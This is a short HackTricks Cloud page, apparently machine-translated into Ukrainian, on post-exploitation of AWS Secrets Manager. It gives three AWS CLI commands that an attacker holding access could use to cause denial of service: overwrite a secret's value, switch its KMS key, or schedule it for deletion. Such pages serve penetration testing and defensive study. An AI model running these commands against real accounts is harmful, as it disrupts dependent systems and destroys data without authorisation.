AWS - Secrets Manager Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Secrets Manager

Для отримання додаткової інформації перегляньте:

AWS - Secrets Manager Enum

Read Secrets

секрети самі по собі є чутливою інформацією, перегляньте сторінку privesc, щоб дізнатися, як їх читати.

DoS Change Secret Value

Змінивши значення секрету, ви можете DoS усю систему, яка залежить від цього значення.

Зверніть увагу, що попередні значення також зберігаються, тому легко просто повернутися до попереднього значення.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Зміна ключа KMS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Видалення Секрету

Мінімальна кількість днів для видалення секрету становить 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 3 days ago